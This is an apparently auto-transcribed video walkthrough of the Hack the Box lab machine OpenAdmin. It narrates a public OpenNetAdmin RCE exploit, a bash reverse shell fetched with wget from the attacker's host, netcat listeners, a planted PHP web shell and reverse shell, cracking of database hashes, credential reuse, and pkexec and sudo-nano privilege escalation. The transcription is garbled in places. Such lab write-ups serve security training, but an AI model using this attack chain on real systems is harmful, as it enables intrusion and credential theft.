What up, what up? What's up, everyone? Today we're doing OpenAdmin from Hack the Box, Linux Easy Machine, continue the grind and preparation for the CWES. So without further ado, let's jump in. Of course, we're gonna start with an nmap. All ports, that's RIP. Let's save this to, oh wait, let's create an nmap directory and a fuzz directory. Port 8022, and this will be our methodology for all the machines, and we're gonna update this as we go. The scan already finished. Let's throw some scripts on the open ports. -a. Let's check what is in that port. So it's the default Apache page, it seems. Okay. So we have Apache HTTPD 2.4.29. Let me add this here. Okay. Post options. Get. Let's start with the web server and fuzz it. Let's go to fuzz and do let's use fuff. Let's do Turpaster lowercase medium. Get rid of the comments, put some color, and output this as root derp medium. Music. Okay. Let me check this out. So all this seems to be static. This is draft text, lorem ipsum. This gets us to Ona. Okay. This seems to be old, to be honest. Your version, you're not on the latest release. Your version is this. Latest version. And when I go to download, it says HTB OpenAdmin.com. Let's see what's that. So this is actually a thing. That's the name of the box we're doing, right? So it must be something, must be a hint. So first thing that comes in my mind is that let's check for exploits or vulnerabilities that are related to OpenAdmin version 18.1. OpenNetAdmin. OpenNetAdmin exploit. And it seems that there is a remote code execution. Was it that easy? Okay. So I just run this and that's it. I feel like this will be a short video, guys. Okay, let me try this out. Let's create an exploits directory. So this is a Ruby script. Let's check the script. So this is going to tooltips something. And let's go ahead and run it. So I just run exploit and then our target and the command we want to run. So exploit. Let's copy this. ID cannot load such file. Ruby gems. Is it a gem that I have to install or some sort? Gem update, gem install. Let's try this. So gem install HTTPX. Ta-da, we have RC. Okay. Let's get a reverse shell. Let's create bash reverse shell. Fifteen 168. Let's spin up a Python web server to host our malicious script. And now let's go ahead. Does it work with quotes? Perfect, it works. Let's first check if we have wget on the target machine using the which command. We do. And now let's attempt to upload our reverse shell. 10 15 168 shell.sh. Let me make this bigger for you guys. Let's save it into temp. Like this. It seems that it was successful. Let's check if this is indeed correct. Yep, there it is. So we can go ahead and run bash. Let me create a new session here. Let's do nc nvlp on port 1001 and run. It hangs and we have a shell. I should stop the video here, to be honest, because this is it. I mean, for the CWES, we do care about the web part, but we could try the privilege escalation part as well. Just why not? That was easy. Okay. So where did we landed? We landed in tap tap tap. Opt ONA tap tap tap. Let's see, is there a database somewhere around here? Okay, before I continue, do we have Python? We do. Let's get a better shell. So we can use shortcuts as Control L to clear the screen and all that good stuff. There we go. Okay. Normally when I get into a web app and I'm tap tap tap, I'm looking for database passwords if there is a database. Let's do a netstat. There is a database. Can see that from here. And there is also a weird port listening. Okay. Nothing here. Let's see what users do exist on the box. So there is Jimmy and Joanna. Okay. Okay, so we do have a password. Let's try and access the database. What is the name of the database? OpenAdmin default. Okay. Perfect. We are in. I think it's use, right? Use. Let me check that once more. So we want to connect. Click connect to the host server. Optional arguments are DB and host. Okay, so connect to on default. We are connected. Let's select what was it? Show tables. There we go. We want users, right? Yeah. So we're gonna go ahead and do select everything from users. And we have guest and admin. So is this MD5 or is that a password? Okay, let me go to CyberChef or can't remember. CyberChef chief. Okay. Analyze hash. Yeah. That must be an MD5. Let's attempt to crack it. Let's go back. Let's do files. Let's go to hashcat nodes. So hash mode 0. Hashcat 0. Let's get the hash and let's use user share what list rock you. So it's admin. Okay. What about the guest? Save that here. Test. Okay. And map scans. This is ugly. Okay. Mhm. Okay. Anything abnormal here? Let's move to temp. See what we have. That's just our shell. Let's go to home and see if we can access any of the directories. Jimmy. Nope. Joanna. Nope. Okay. Let's run linpiece to make our life easier. What? Oh. Perfect. And I see that my shell is broken. Yeah, I don't like that. Let us fix that. I think you might be able to hear my dog snorting in the background. Okay. I think we fixed that now, right? Yep. We have a sip. That's our shell. Contap. Mm, yeah, this is interesting. If I don't find anything from Linpiece, I'll go ahead and check this one and see where it is. Okay, that's interesting. So Joanna can run sudo can nano into this. Let me save this. So for sure we need to get into Joanna. Access the server as Joanna. Whoa. That's it. PK exec binary has sweet bit set. So we can escalate privileges this way. And it's the vulnerable version 0.105. So we get back. What else do we have? Internal OpenAdmin.htb. Okay. This is what's running on internal OpenAdmin.htb. Assign user Joanna. Okay, I think this is the intended way of doing the box. Like I have to use port forwarding to expose this port and then access it from the outside, and then find a way to exploit this, get into Joanna, access the server as Joanna, and then use this sudo. Okay, let me go ahead and add this as well. To here. What else? Yeah, I think that's the path. Log files with weak permissions. I'm not in the ADM group, right? This is weird though. So the group is root, but we can read the log file. Yeah, we could try and check if there is anything there. That is interesting. But at the top. Okay. Let me just go to var real quick and see this. Access denied, okay. Okay. Let's try the easy way first, using pkexec, and maybe we do both. So I have it in my notes here, how to exploit that. So this is what I have. Let me just show you what I mean. Lin piece, pkexec version, and this is how you exploit it. So let me follow my instructions. Still git clone this. I did it twice. So then I do this. Do we have GCC? Oh no. Okay. Let's do it here and see how it goes. Poke. this is an Ubuntu 18. So if I go ahead and spin up, which is a longer process, but I think it will work, we can go ahead and spin up an Ubuntu 18.04.3 LTS, then compile the exploit in that server and upload it back here, and it should work, to be honest. But I'm not going to spin a new Ubuntu server right now, so let's go ahead and go for the other way, which is to expose the port found. Which is this. Okay, do we have, I think we have SSH, right? Yeah, we do. We have to do a reverse. Let me first of all check if SSH is up and running. Sudo system ttl SSH to status. So it's not running, right? Inactive. So let's do start. Check that again. Now it's running. Okay. And then we can do shr, do this. Two 846. I think I do and it's down. There we go. So if we go ahead and try to access this, we get this. Okay. As we saw earlier, though, there is some. Let me go ahead and sudo nano. Let's see. Hosts. Is that going to break? Never done this before. Like, am I supposed to add this here now? Like, do internal dot, what was it? Or do I have it in my notes? I think I do have it. Yeah. Internal OpenAdmin. Let's see, am I going to break everything? OpenAdmin dot hack the box. And then attempt to internal open. Okay. We can go ahead and get another shell. Let's do port for and then let's put that here and attempt to get another shell. So exploit, there we go. Or we can use, yeah, we can use the one that exists. Perfect. Yeah, the reason I want to do this is just maybe there is some files we can check, because this is in var internal. Can I access that? Var internal. Yeah, permission denied. So I cannot access that. Okay. So let's start our enumeration on this. We can go ahead and try admin, login, wrong username or password. This indicates that we cannot enumerate users. So is this just a form? View page source. Let's see. Okay. Okay, let's go ahead and use FUF on this. Fuzz, user share, word list, seg list, to discovery, web content, raft, small directories. And let's say internal.openadmin.htb, or just leave it there and say raft small directories.txt. That's good enough. Okay. If I refresh, yeah, this changes. So this is the requests we are sending. Stripper post to Nona. This is something. That is a race condition. Hmm. Okay, server status is interesting. Um, let's try files. That is main.php. Which is this? Okay. And we can fast for files now. So we can do extensions. We get 302 though. Let's spin up burp. Hmm. Okay. Here is built-in functionality of the Apache HTTP server software that provides information about the current status of the server and its ongoing operations. It is typically accessible via URL. Okay. Yeah, this is what we found, right? Okay. On two columns specifically, vhost and request. Oh, so maybe we can't find anything. So okay, let me read that real quick. Virtual hosts are a feature of web servers that allow multiple domains to be hosted on a single server using a single IP address. Each domain is assigned a separate set of configuration settings and can have its own web content which is served to visitors who request that domain. This is important because different vhosts provide different services and information. For example, let us say the example.com says status page shows records of requests given to the different hosts, vhosts. Example.com, backend, and backend 2. I see. Okay, so here we found this is one vhost, and there was another one on OpenAdmin.htb. Maybe this is the case. So let's go ahead and remove this. Let's see. And try to access the same thing. Server status. Internal. So is this, so can we access this? Let me check that. Another thing. So we could find maybe this leaks information. This is what it's all about. Where is it? Let me see something first. So where was it? There must be a way to go to join through that app. However, maybe you have to get Jimmy first. Here is what I want to see. So we do have OpenAdmin. Okay. And we also have internal OpenAdmin. Maybe there is access logs, which I don't know if we can access, to be honest. We have to check that out. There we go. No, this is, sorry, this is, I'm looking for the, Emacs less. Yeah, let me get a stable shell here as well. Let me go to var log. Okay. This is a weird one. I'm not part of the admins right now. Yeah. Let me go ahead and see what's in there. Oh. We didn't try. Wait. Maybe it's easier than we think. Johanna. Admin. No, right? Login is restricted. Enter username and password. It's good practice to keep fuzzing. Let's get a big list and do whoa. Word list, terpaster. Let's do medium, lowercase. Remove this. Do terpaster medium. Let that go. Yeah, I've seen that before. Does Sima have access to anything else? I think must be something with the server status. access that hub. Oh, I'm on my server. Jesus. Yes. Hmm. So we got that out. We check the users. We cannot access any of the users. We cannot access Jamie or Joanna. We've run Limpies. We found the internal application. Maybe sites enabled. Internal conf, and we've seen that, right? There's 2 sites available. Let's do internal conf. Now the logs of the Apache. Maybe we have something there. Yeah, permission denied. So it must be something with this app. Okay, let's open Burp. But before continuing with Burp, I will do a small break and then I'll come back for you guys. I'm gonna do it right here. Let's open this right here. This, make sure that this works. Perfect, it does. Let me do admin. Let's see how this behaves. Yeah. But let me see something before I go for a break. So, okay. Remove this. What if I do what is that? PHP? Tutorials point.com. Yeah, I'm gonna go have a break, you guys, and I'll come back. Had my break. So let's continue. Let's test and see more thorough what's happening when we do try to log in. Let's do admin again. Oh, maybe we could try something like SQL injection. I think there's no error indicating that. Same thing, can see here 2.885 bytes. If that changes, maybe we have something. Still the same. Still the same. Can try logging something like true, maybe. Still the same. Okay. We didn't find anything from here. So, oops. Let me. So, we did try medium word links directories from Terpaster. We tried craft small directories from me. Take all these with extensions and files. We can put that here. vhost we cannot try because we know there are no vhosts. We did view the page source. We did. There's no upload functionality. Injections we did try. So let's take a step back and see what we have. So we found a DB password where we connected, but and we found these two accounts, admin and guest. We cracked the passwords, but there is no use of those passwords. Then we found out that Joanna can run nano as root, but we didn't find a way to get into Joanna. We do know that this is vulnerable to pkexec, but unfortunately we cannot run because we don't have GCC. We cannot compile the exploit and run it. However, what we didn't try is that we can spin up an Ubuntu web server, compile the exploit there, and then upload it to the target. So why not? Let's go ahead and do that, right? So I've already downloaded and as I remember correct, I think this is the correct one. Ubuntu 04.6. Let me check once more that this is the correct one. So let me this is 04.3. So let me go ahead and grab that one. 04.3. Get back. Okay, so I think this should do. We can try with this. So I've downloaded this one, server install image. So let me go ahead and create a new machine. That is the image. Next. Let's do Ubuntu. Yeah, why not? Next. That's fine. Let's do bridge. Finish. Let's see if we manage to get this working real quick. English. Continue without updating. Done. That's fine. Okay. Use the entire disk. Okay. Continue. Let's do Ubuntu. Yes, we want an SSH server. Let's see. Till that finishes, let's continue our enumeration and see if we can get any further. So let me try a few things. So let's try to move into Joanna with Joanna. Nope. What was the other user? Password D and grep for everything that ends with sh. Jimmy. Jimmy. and try Jimmy. Nope. We can try and run link piece once more. Maybe we missed something. There is SSH as well. And we didn't try that, to be honest. So let's do SSH, Joanna. What was the target? Yes. Joanna. No. Admin. Test. Try Jimmy. Jimmy. Admin. Test. Nope. Searching passwords inside logs. Nothing here. I'll check that. I'm pretty sure I'm missing something that I didn't try. This is where we have to end up. We have to end up accessing Joanna. Okay, normally when I get stuck, I start to write the like what we did till now. So we found out that the /owner was an exploitable OpenAdmin, and we got RCE as www data looking around the configuration files, we found the password of the database. Ninja Warrior. And we were able to get the database MD5 hashes and crack them with hashcat. Running link piece revealed that Joanna has sudo permissions and that the machine is has a vulnerable version of pkexec. Try default passwords including usernames for SSH access, but no luck, both for Jimmy and Joanna. Yeah. Is it still going? I think this is done. Let's give it a bit of time. Can drive brute force SSH. But I don't think that's the path. I know, wait. We didn't try this. Because obviously this is a password that the users put, right? Maybe we can try SSH with that. SSH, Jimmy. Yes. Okay. But we want Joanna. It's fine, we got Jimmy. Let's see. Always try to see if passwords are reusable, right? Okay. Let's see, where do we have access to the Jimmy then? The flag is not here. There is p.local. let's see, and bash history is not available. Can we access Joanna? No, we can't, right? Yeah, we can't. Wait, maybe Joanna used the same password. Am I right? No, maybe through SSH. No, I don't think. Nope. Okay, let's get back to Jimmy. And run linpiece again. Linpiece is gone. Let's re-upload it. Let me get back here. Let's say data and make this Jimmy. Cool. Jimmy tab have sudo. Copy. Nope. Okay, we can run linpiece on Jimmy. Let me get back to documents, HTB, and get to OpenAdmin, serve that to Jimmy and say wget HTTP. Ten 15 168 linpiece.sh temp linpiece.sh. Okay, and now we can do bash and see what we have here. Let me check if that thing that finished, right? Yeah, okay, let's reboot. Great. SSH is open. Okay, so we can go ahead and connect on that. Me back here, see the IP 1090. Okay. Do we have GCC, right? We do have. Okay. Let's see what we have with Jimmy. Go up to the top. Okay. Let's see. Where do you have access, Jimmy? Open files by process. Okay. Okay, so we're in the internal group, which means we should search for files that are accessible from the internal group. That's nice. Let me grab this real quick. And put that here. Say Jimmy. Mm, let's see. Maybe we can check that if sudo version is variable. Interesting writable files owned by me or by group writable file. There we go. This is the how to check this out. Let me check that. Okay, let's see. we actually, yeah, now we do have GCC. Yeah, we do. Perfect. Let's try this. So let me get to, where was it? Where's my notes? PK exec. We don't have git though, right? Now we do. Perfect. Git. Let me take this. Let's go into here. Let me GCC this was POC. Okay. And now let's get that to our server. Let me go back to exploits and SSH. No, it's SCP. Nothing. It's Ubuntu at S. Let me do PWD. Yes. POC. Put that here. Perfect. Now we do have it. And let's upload this to the server. Back to tab, remove this POC, and let's upload. Okay, there we go. Shmod xpoc. Cannot cover measure, cannot open UTF-2.kit. The incident has been reported. GCC not found. So this didn't work. Okay, let me. No. Okay. It didn't work. Okay, so what did we. So we know we're in the internal group and we can access this. So let's go ahead and access that. Let's see. Yeah. Perfect. OpenAdmin. Wait. So it says here that output shell exec cat home to the sage ID. Don't forget your ninja password. So SU Joanna Ninja. Weird. So we can access this now as Jimmy and the ninja password. Let's see. Admin, ninja password, Joanna, ninja password. Okay, that's a password. So username Jimmy, and hash post this. SHA 512. Yeah, that's it. Okay, let's try that out. Let's see. Exhausted. Did I put this? No. That is weird. Let me see. Let's cut everything. Okay, we should search for anything accessible by the internal group, and I have something, my notes to do that with find. So yeah, this is what I have right here, based on user, based on group. So we want to find group. Let's try this one. So one group internal. Start from the beginning, and I think that is a way to yeah, we want that as well. Oh wait, I can change that. Wait, can I do? But this is run by Jimmy, right? Yeah. Or not, I don't know. Let's try that. I'm not sure. I think I'm gonna get a shell again as Jimmy, but it's worth a try. PHP system get dot yeah, it's Jimmy. So if I go shell.php, yeah, I'm gonna get Jimmy. I don't know why I'm doing this. This is embarrassing, but whatever. No, I'm Joanna. Yay! Yeah, because this server is running as Joanna, right? Yeah. Yeah. Assigned user Joanna. So we have a shell as Joanna finally. Okay. So let us get, we don't need this anymore. Let's go back to files. No, back to go to shell and change this a bit, make it 1337 for lit. Sudo C NVLP 7. Okay, we're ready to rock. Let's go here and do wget HTB 10 15 168. One shell.sh o temp shell.sh. Let me plus oh, is it deleted? It's not. Maybe %20 and %20 %20. No. Let me get that to bear very quick. Set this on. Let me put that here and see what's going on here. So okay, nothing happens. What if we let's URL encode it. Yeah, sorry about that. Okay. So let me URL encode this. No. No. What if we upload a reverse shell than a PHP reverse shell rather than a PHP shell, web shell, sorry. So PHP reverse shell Linux. Let me get that from Pentest Monkey. There it is. Let us copy downloads. Jesus. There it is. Okay. Let's do gunzip PHP reverse shell. Now let's do tar xvf this and mousepad. Remove all these. Let's put our IP 10.10.15.168. .337. Whoops. And let's try this one. Let me close this and copy files. is rev.php, and now let's go here. And no, actually you can go here and do wget HTB 10.10.15.168 rev.php. Now rev.php. There we go. And now we can go ahead and test this. Let me go here. Move that the other way. Put that here. And let's see if that works. Yay! So we are Joanna. Exit. Now let us get a better shell, and let's call this Joanna. Stable shell. Export term equals xterm. Cool. And now we can do sudo l. Operation not permitted, but we know we can do it though because we found out from here. Let's try doing this then. Sudo operation not permitted, set UID, blah blah blah. Okay, let's go to home. I remember Joanna has a key, right? Got user.text. Yes, that's the. Let's cut this out. Let's go back to files and do nano ID RSA. Slap that there. Let's mod 400 ID RSA SSH ID RSA Joanna at what's the IP of the machine? This Ninja? No. Third passphrase for key. Is it the same? No. Okay, we can create a key. Keygen. Yes. Yes. No passphrase. Perfect. So let's try this. Let's remove the previous one. Sudo remove ID RSA. Create a new one. Slap that there. Shmod 400 ID RSA. Let's try the same thing. it needs a key as well. Well, Ninja. Um, tried that. We did try it. Yeah. Okay, so we cannot run sudo l because of this. And we can not run sudo nano, right? Yeah, same thing. Cannot log in with the. Let's go ahead and run linpiece again. Yeah, I cannot do that. Let me search for this real quick, but till we do that, let's re-upload linpiece. But I don't know, maybe it's because something wrong with the reverse shell. Maybe we can get a new shell, a better shell, and see NVLP. Let's do 9000, 9000. And let's use this. Maybe get a better shell, I don't know. Might work. Okay, now same thing. Okay, so this is not the case. We can attempt to crack the password as well, to be honest. And let me see, I do have it in my notes somewhere. How to crack SSH. I have it in password attacks, cracking files. I think it's SSH to John. Then I give it the IDRSA and I do SSH hash. What do you mean? Oh yeah. It's the previous one that did have the password, right? Yeah. What am I missing here? Yeah, let's run link piece. Mm, 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 mm. Hmm. Check this. Yeah, but I cannot. No. And Okay, let's search what's that. Oh no, sorry guys. Okay, I think the box defeated me. I'm gonna go ahead and see. I feel like I'm close, but I have no power. No power left. So I'm gonna go ahead and see the walkthrough. So we managed to find the vulnerable OpenAdmin. We got an RC, that was easy. Then we reused credentials and got into Joanna. We also found an internal app which didn't help at all. I think it was a rabbit hole, but it has a hint, which I don't know if that hint, like in main, it says here shell exec cut home blah blah blah, so it cuts the key. Don't forget your ninja password, it says. Okay, let me try another thing. Let's go to, because there must be a password somewhere. This is what I believe. Let's go into Joanna's home and maybe in config. No, I don't think there's anything in here, but let me see. Config YAML. Maybe something in the profile. Yeah, cut dot profile. Can't see anything there. Cut dot bash rc. Seems like a regular bash rc. Maybe something in the cache. Yeah, I'm gonna go ahead and see. So we got user flag, but no root for us. Let's see what we missed. Of course, I'm gonna watch IPSEC after to see how he did it. But let me go ahead and have a sneak peek. Yeah. Okay. So this was an LFI tcm.php module, and then it turns to RC, I guess. Yeah. Okay. We found this as well. He tried it immediately. We should do that as well. The next time we found a password, we have to test it immediately to other users to see if uh, oh, so it did crack it, but it used some rules to do so. Interesting. Oh, shoot. So, okay. So we failed to crack the password because we didn't use the rules. However, then he found the key, which we replaced with a new one. But when he found the key, he then used SSH to join as we did, then cracked it with John. But the first key, because we replaced the key, we couldn't get the password. Then he SSH'd in as Joanna, and with the key, yeah, this is what we did. We did the alternative method rather than cracking the key. And the privilege escalation here. What happened here? So running limpis again shows that Joanna is allowed to run nano as root. Yeah, we've noticed. This can be used to get root access on the server. Sudo u root bin nano. Oh, the command reveals that we can execute system commands using press Ctrl X and enter the following command to spawn a shell. So this is what it means when it says all no password. Yeah, but us is different, right? Yeah, here it says all no password. Oh yeah, that's it. Okay, I should add it to my previous notes. I didn't know that for some reason, or I did have it and I didn't check for it. So let me go here and let's do sudo. I should put that here for you guys to see. So let me do it like this. What I'm writing here is that sudo files is readable, it says, and we get this all no password bin nano opt priv. And what I'm writing is that if we are logged in as Joanna and we know the above, we can run sudo like this, sudo I think this is correct. I don't know if it's correct or not. I have to research it a bit more. Sudo bin sudo u root bin nano oh prev, yeah, whatever. So let me go ahead and try this. Yeah, I get this. And I think it's because I didn't log in as with SSH. Okay. Perfect. Guys, I got defeated. I tried everything. Maybe I should try harder, but I got my OCP and I'm not trying harder enough because I got it. I don't know why. Yeah, that's all from me. I hope you guys enjoyed this, learned something, and I still have a long road in front of me. And when I feel ready, I will go for the CWES exam. But I think I need more practice for now. Thank you for being here with me in this journey, and I'll see you on the next one. Bye.